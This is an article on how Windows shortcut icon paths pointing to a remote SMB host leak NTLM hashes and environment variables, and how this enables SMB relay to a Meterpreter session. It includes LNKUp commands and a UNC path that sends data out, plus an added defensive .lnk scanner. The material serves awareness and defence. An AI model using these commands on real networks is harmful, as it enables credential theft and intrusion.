Windows shortcuts: where do they lead and can they be dangerous?


    In this article we will look at how standard Windows functionality available when creating shortcuts can be used to compromise systems, and how to defend against it.

    How does it work, and should I be worried?


    Most Windows users probably know that running suspicious programs and clicking on unknown shortcuts is unsafe, and even the least careful users try to avoid doing so. So we will not dwell on that.

    Most users have also, at least once, tried to change a shortcut's icon.

    Let me remind you that this is done through properties, something like this:



    And what values can be specified in this field?



    Does the path have to be local? No. That is, you can specify something like this here:



    And when the user opens the directory containing such a shortcut, the following happens.
    Screenshot from Wireshark on machine 192.168.1.3:



    Server 192.168.1.3 could not accept the TCP connection because it is not listening on TCP port 445, i.e. SMB. At first glance it might seem that there is nothing to worry about, but that is not the case.

    Server 192.168.1.3 can complete the TCP handshake and act as an SMB server, for example using the Metasploit framework module .



    Let's open the directory with the shortcut again and then check the Metasploit console.



    We got the NTLM hash of the user who “saw” our shortcut.

    This behaviour has been known for over 20 years, since the days of WinNT / Win95, and exists to this day. Microsoft offers NTLM Blocking as a way to deal with this vulnerability, but the user must configure it himself



    and read up on all the "buts".



    Some ISPs block outgoing Internet traffic on port 445, which also protects users whose machines do not have the corresponding policies enabled, but this does not protect against attacks from the local network.

    LNKUp - automating the process


    More recently, the LNKUp tool was released, which automates the creation of .lnk files like the one we looked at above. You can download it from the official GitHub.

    The utility is written in Python, runs under Windows and requires the Python packages pylnk and pypiwin32.



    Use the following command to create a shortcut that captures an NTLM hash:

    python generate.py --host HOST --type ntlm --output out.lnk
    

    where HOST is the machine running the Metasploit SMB server.

    The second use case for LNKUp is obtaining the user's environment variables. This works because environment variables can be used in the shortcut properties, for example like this:



    To read them, run a sniffer on machine 192.168.1.3.

    The command to create the shortcut looks like this:

    python generate.py --host 192.168.1.3 --output out.lnk --type environment --vars PROCESSOR_ARCHITECTURE

    And in the traffic dump we will see:



    That is, the icon path in the shortcut properties looked like this:

    \\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE%

    Thus, the user does not need to launch anything; it is enough to open the directory containing the malicious shortcut, for example a network share, or to "see" it when connecting external media.
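    As an added defender-side example (not from the article or from LNKUp), here is a small Python scanner that parses the ICON_LOCATION string of a .lnk file according to the MS-SHLLINK layout and flags shortcuts whose icon points at a UNC host, including the %VAR% pattern shown above. It assumes a plain shortcut whose icon path lives in StringData (ExtraData blocks such as IconEnvironmentDataBlock are not parsed), and the shortcut it builds for the demo is constructed, not taken from the article.

```python
import re
import struct
from typing import Optional

# LinkFlags from MS-SHLLINK. StringData entries follow the header in this order:
# Name (0x04), RelativePath (0x08), WorkingDir (0x10), Arguments (0x20), IconLocation (0x40).
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE, HAS_ICON_LOCATION = 0x01, 0x02, 0x80, 0x40
STRING_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

def lnk_icon_location(data: bytes) -> Optional[str]:
    """Return the ICON_LOCATION string of a shell link, or None if absent.
    ExtraData blocks (e.g. IconEnvironmentDataBlock) are not parsed here."""
    if data[:20] != LNK_HEADER:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                   # ShellLinkHeader is fixed at 76 bytes
    if flags & HAS_ID_LIST:                      # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for flag in STRING_FLAGS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        size = count * 2 if unicode else count
        raw = data[pos + 2:pos + 2 + size]
        pos += 2 + size
        if flag == HAS_ICON_LOCATION:
            return raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return None

def classify_icon(icon: Optional[str]) -> Optional[str]:
    """Label icon paths worth reviewing: UNC path to a host, or UNC path with an env-var leak."""
    if icon and re.match(r"^\\\\[^\\]+\\", icon):
        return "env-var-leak" if "%" in icon else "remote-unc"
    return None

def build_sample_lnk(icon: str) -> bytes:
    """Constructed minimal shortcut (header + ICON_LOCATION only) for the demo."""
    header = LNK_HEADER + struct.pack("<I", HAS_ICON_LOCATION | IS_UNICODE)
    return header.ljust(0x4C, b"\x00") + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")

if __name__ == "__main__":
    sample = build_sample_lnk(r"\\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE%")
    print(classify_icon(lnk_icon_location(sample)))   # env-var-leak
```

    Run it over every .lnk in a share before trusting the directory; any shortcut reported as remote-unc or env-var-leak deserves a look before a user, and especially an administrator, browses there.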

    SMB-Relay when browsing a directory


    Using the Metasploit framework, you can also start another kind of SMB server with the exploit/windows/smb/smb_relay module and carry out an SMB relay attack.



    Now suppose that a malicious shortcut has been placed in a network directory that administrators usually use to install software. The next time an administrator opens that directory, their NTLM authentication will be relayed to the chosen machine on the network.



    And a Meterpreter session will be obtained.





    Based on all of the above, we can conclude that NTLM authentication should be abandoned wherever possible, and that increased attention should be paid to network security and to access control on shared resources where an attacker could place malicious objects.
